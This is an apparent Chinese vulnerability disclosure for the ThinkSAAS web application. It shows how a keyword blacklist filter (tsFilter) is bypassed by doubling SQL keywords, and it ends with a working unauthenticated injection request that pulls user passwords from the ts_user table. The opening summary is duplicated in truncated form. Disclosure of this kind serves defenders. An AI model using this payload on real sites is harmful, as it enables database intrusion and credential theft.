### 简要描述: ThinkSAAS最新版绕过过滤继续注入。 无gpc限制,无需登录认证。 ### 详细说明: 旧版本分析如下: [WooYun: ThinkSAAS SQL注入#6](http://www.wooyun.org/bugs/wooyun-2013-046826) 在新版本里进行了两处修复: 第一处修复,文件\app\tag\action\add.php: ``` case "do": $objname = tsFilter($_POST['objname']); $idname = tsFilter($_POST['idname']); $objid = intval($_POST['objid']); $tags = t($_POST['tags']); $new['tag']->addTag($objname,$idname,$objid,$tags); tsNotice('标签添加成功!'); break; ``` 把之前的t函数换成了tsFilter函数。 第二处修复,文件\thinksaas\tsApp.php: ``` foreach ( $row as $key => $value ) { $value = $this->escape ( $value ); //$vals [] = "`$key` = $value"; $vals [] = "{$key} = {$value}"; ``` 对$value变量进行了escape过滤 添加了新的构造sql语句的赋值语句 但是这种修补我们依然可以进行注入。 来看看tsFilter函数: ``` function tsFilter($value){ $value = trim($value); //定义不允许提交的SQl命令和关键字 $words = array(); $words[] = "add "; $words[] = "and "; $words[] = "count "; $words[] = "order "; $words[] = "table "; $words[] = "by "; $words[] = "create "; $words[] = "delete "; $words[] = "drop "; $words[] = "from ";...
### 简要描述: ThinkSAAS最新版绕过过滤继续注入。 无gpc限制,无需登录认证。 ### 详细说明: 旧版本分析如下: [WooYun: ThinkSAAS SQL注入#6](http://www.wooyun.org/bugs/wooyun-2013-046826) 在新版本里进行了两处修复: 第一处修复,文件\app\tag\action\add.php: ``` case "do": $objname = tsFilter($_POST['objname']); $idname = tsFilter($_POST['idname']); $objid = intval($_POST['objid']); $tags = t($_POST['tags']); $new['tag']->addTag($objname,$idname,$objid,$tags); tsNotice('标签添加成功!'); break; ``` 把之前的t函数换成了tsFilter函数。 第二处修复,文件\thinksaas\tsApp.php: ``` foreach ( $row as $key => $value ) { $value = $this->escape ( $value ); //$vals [] = "`$key` = $value"; $vals [] = "{$key} = {$value}"; ``` 对$value变量进行了escape过滤 添加了新的构造sql语句的赋值语句 但是这种修补我们依然可以进行注入。 来看看tsFilter函数: ``` function tsFilter($value){ $value = trim($value); //定义不允许提交的SQl命令和关键字 $words = array(); $words[] = "add "; $words[] = "and "; $words[] = "count "; $words[] = "order "; $words[] = "table "; $words[] = "by "; $words[] = "create "; $words[] = "delete "; $words[] = "drop "; $words[] = "from "; $words[] = "grant "; $words[] = "insert "; $words[] = "select "; $words[] = "truncate "; $words[] = "update "; $words[] = "use "; $words[] = "--"; $words[] = "#"; $words[] = "group_concat"; $words[] = "column_name"; $words[] = "information_schema.columns"; $words[] = "table_schema"; $words[] = "union "; $words[] = "where "; $words[] = "alert"; $value = strtolower($value);//转换为小写 foreach($words as $word){ if(strstr($value,$word)){ $value = str_replace($word,'',$value); } } return $value; } ``` 这个很容易的就可以看出,诸如将“select”改为“selselect ect”,就可以绕过过滤。 所以最终可以注入出数据的exp为: EXP: ``` 链接:http://localhost/thinksaas/index.php?app=tag&ac=add&ts=do post:objname=article=1, tagname=(selselect ect pwd frofrom m ts_user limit 0,1), count_group&idname=1&objid=1&tags=111111 ``` [<img src="https://images.seebug.org/upload/201403/11130241c3aefbdb9bf62dc449a6268c5990641b.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/11130241c3aefbdb9bf62dc449a6268c5990641b.png) [<img src="https://images.seebug.org/upload/201403/111302488e036adcf4c7bdfd99acf6f0b6d8fdff.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/111302488e036adcf4c7bdfd99acf6f0b6d8fdff.png) ### 漏洞证明: 见详细说明
